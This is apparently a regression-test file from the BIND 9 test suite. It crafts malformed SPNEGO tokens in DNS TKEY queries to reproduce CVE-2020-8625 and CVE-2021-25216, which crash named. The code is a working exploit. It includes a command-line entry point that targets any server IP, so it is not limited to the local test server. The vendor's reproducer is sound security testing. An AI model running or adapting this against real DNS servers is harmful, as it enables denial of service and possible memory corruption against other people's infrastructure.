1#!/usr/bin/python
2############################################################################
3# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
4#
5# SPDX-License-Identifier: MPL-2.0
6#
7# This Source Code Form is subject to the terms of the Mozilla Public
8# License, v. 2.0. If a copy of the MPL was not distributed with this
9# file, you can obtain one at https://mozilla.org/MPL/2.0/.
10#
11# See the COPYRIGHT file distributed with this work for additional
12# information regarding copyright ownership.
13############################################################################
14
15"""
16A tool for reproducing ISC SPNEGO vulnerabilities
17"""
18
19import argparse
20import datetime
21import struct
22import time
23
24import pytest
25
26pytest.importorskip("dns")
27import dns.message
28import dns.name
29import dns.query
30import dns.rdata
31import dns.rdataclass
32import dns.rdatatype
33import dns.rrset
34
35
36class CraftedTKEYQuery:
37    # pylint: disable=too-few-public-methods
38
39    """
40    A class for preparing crafted TKEY queries
41    """
42
43    def __init__(self, opts: argparse.Namespace) -> None:
44        # Prepare crafted key data
45        tkey_data = ASN1Encoder(opts).get_tkey_data()
46        # Prepare TKEY RDATA containing crafted key data
47        rdata = dns.rdata.GenericRdata(
48            dns.rdataclass.ANY, dns.rdatatype.TKEY, self._get_tkey_rdata(tkey_data)
49        )
50        # Prepare TKEY RRset with crafted RDATA (for the ADDITIONAL section)
51        rrset = dns.rrset.from_rdata(dns.name.root, dns.rdatatype.TKEY, rdata)
52
53        # Prepare complete TKEY query to send
54        self.msg = dns.message.make_query(
55            dns.name.root, dns.rdatatype.TKEY, dns.rdataclass.ANY
56        )
57        self.msg.additional.append(rrset)
58
59    def _get_tkey_rdata(self, tkey_data: bytes) -> bytes:
60        """
61        Return the RDATA to be used for the TKEY RRset sent in the ADDITIONAL
62        section
63        """
64        tkey_rdata = dns.name.from_text("gss-tsig.").to_wire()  # domain
65        if not tkey_rdata:
66            return b""
67        tkey_rdata += struct.pack(">I", int(time.time()) - 3600)  # inception
68        tkey_rdata += struct.pack(">I", int(time.time()) + 86400)  # expiration
69        tkey_rdata += struct.pack(">H", 3)  # mode
70        tkey_rdata += struct.pack(">H", 0)  # error
71        tkey_rdata += self._with_len(tkey_data)  # key
72        tkey_rdata += struct.pack(">H", 0)  # other size
73        return tkey_rdata
74
75    def _with_len(self, data: bytes) -> bytes:
76        """
77        Return 'data' with its length prepended as a 16-bit big-endian integer
78        """
79        return struct.pack(">H", len(data)) + data
80
81
82class ASN1Encoder:
83    # pylint: disable=too-few-public-methods
84
85    """
86    A custom ASN1 encoder which allows preparing malformed GSSAPI tokens
87    """
88
89    SPNEGO_OID = b"\x06\x06\x2b\x06\x01\x05\x05\x02"
90
91    def __init__(self, opts: argparse.Namespace) -> None:
92        self._real_oid_length = opts.real_oid_length
93        self._extra_oid_length = opts.extra_oid_length
94
95    # The TKEY RR being sent contains an encoded negTokenInit SPNEGO message.
96    # RFC 4178 section 4.2 specifies how such a message is constructed.
97
98    def get_tkey_data(self) -> bytes:
99        """
100        Return the key data field of the TKEY RR to be sent
101        """
102        return self._asn1(
103            data_id=b"\x60", data=self.SPNEGO_OID + self._get_negtokeninit()
104        )
105
106    def _get_negtokeninit(self) -> bytes:
107        """
108        Return the ASN.1 DER-encoded form of the negTokenInit message to send
109        """
110        return self._asn1(
111            data_id=b"\xa0",
112            data=self._asn1(
113                data_id=b"\x30",
114                data=self._get_mechtypelist(),
115                extra_length=self._extra_oid_length,
116            ),
117            extra_length=self._extra_oid_length,
118        )
119
120    def _get_mechtypelist(self) -> bytes:
121        """
122        Return the ASN.1 DER-encoded form of the MechTypeList to send
123        """
124        return self._asn1(
125            data_id=b"\xa0",
126            data=self._asn1(
127                data_id=b"\x30",
128                data=self._get_mechtype(),
129                extra_length=self._extra_oid_length,
130            ),
131            extra_length=self._extra_oid_length,
132        )
133
134    def _get_mechtype(self) -> bytes:
135        """
136        Return the ASN.1 DER-encoded form of a bogus security mechanism OID
137        which consists of 'self._real_oid_length' 0x01 bytes
138        """
139        return self._asn1(
140            data_id=b"\x06",
141            data=b"\x01" * self._real_oid_length,
142            extra_length=self._extra_oid_length,
143        )
144
145    def _asn1(self, data_id: bytes, data: bytes, extra_length: int = 0) -> bytes:
146        """
147        Return the ASN.1 DER-encoded form of 'data' to be included in GSSAPI
148        key data, designated with 'data_id' as the content identifier.  Setting
149        'extra_length' to a positive integer allows data length indicated in
150        the ASN.1 DER representation of 'data' to be increased beyond its
151        actual size.
152        """
153        data_len = struct.pack(">I", len(data) + extra_length)
154        return data_id + b"\x84" + data_len + data
155
156
157def parse_options() -> argparse.Namespace:
158    """
159    Parse command line options
160    """
161    parser = argparse.ArgumentParser()
162    parser.add_argument("--server-ip", required=True)
163    parser.add_argument("--server-port", type=int, default=53)
164    parser.add_argument("--real-oid-length", type=int, default=1)
165    parser.add_argument("--extra-oid-length", type=int, default=0)
166
167    return parser.parse_args()
168
169
170def send_crafted_tkey_query(opts: argparse.Namespace) -> None:
171    """
172    Script entry point
173    """
174
175    query = CraftedTKEYQuery(opts).msg
176    print("# > " + str(datetime.datetime.now()))
177    print(query.to_text())
178    print()
179
180    response = dns.query.tcp(query, opts.server_ip, timeout=2, port=opts.server_port)
181    print("# < " + str(datetime.datetime.now()))
182    print(response.to_text())
183    print()
184
185
186def test_cve_2020_8625(named_port):
187    """
188    Reproducer for CVE-2020-8625.  When run for an affected BIND 9 version,
189    send_crafted_tkey_query() will raise a network-related exception due to
190    named (ns1) becoming unavailable after crashing.
191    """
192    for i in range(0, 50):
193        opts = argparse.Namespace(
194            server_ip="10.53.0.1",
195            server_port=named_port,
196            real_oid_length=i,
197            extra_oid_length=0,
198        )
199        send_crafted_tkey_query(opts)
200
201
202def test_cve_2021_25216(named_port):
203    """
204    Reproducer for CVE-2021-25216.  When run for an affected BIND 9 version,
205    send_crafted_tkey_query() will raise a network-related exception due to
206    named (ns1) becoming unavailable after crashing.
207    """
208    opts = argparse.Namespace(
209        server_ip="10.53.0.1",
210        server_port=named_port,
211        real_oid_length=1,
212        extra_oid_length=1073741824,
213    )
214    send_crafted_tkey_query(opts)
215
216
217if __name__ == "__main__":
218    cli_opts = parse_options()
219    send_crafted_tkey_query(cli_opts)
220